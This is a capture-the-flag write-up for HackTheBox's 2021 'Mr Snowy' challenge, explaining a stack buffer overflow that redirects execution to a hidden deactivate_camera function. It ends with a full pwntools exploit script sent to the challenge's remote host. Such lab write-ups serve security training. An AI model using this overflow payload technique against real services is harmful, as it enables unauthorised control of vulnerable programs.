Event: Cyber Santa is Coming to Town – 2021 HackTheBox
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman… it scares me.. He is always 👀 staring at Santa’s house. Something must be wrong with him.
This is the mission: Deactivate that camera.
Opening the file with Ghidra and analyzing the “investigate” function we can clearly see that there is no way of destroying that camera by any conventional methods.
But inside the list of the Functions there’s something particular:
Opening the function:
This is what we were looking for, our way for getting the flag resides in this function but how can we trigger it?
Python is always a good friend in this type of situation.
Using pwn tools we can find the memory address of the
deactivate_camera function and with a buffer overflow (caused by an unhandled data input) tell the code to call that specific address.
The size of the buffer can be found with some manual try and error payload
payload = b'A'*offset+flag_index #full payload
Add some interaction with the remote host, put everything together and:
from pwn import * host='18.104.22.168' port=32020 p = remote(host,port) e = ELF('./mr_snowy')#elf file for flag memory address print(p.recvuntil("it be")) print(p.recvline()) p.sendline('1')#send data print(p.recvuntil(">")) flag_index=p64(e.symbols['deactivate_camera']) offset = 72 payload = b'A'*offset+flag_index #full payload p.sendline(payload)#send data for i in range(0,18): print(p.recvline())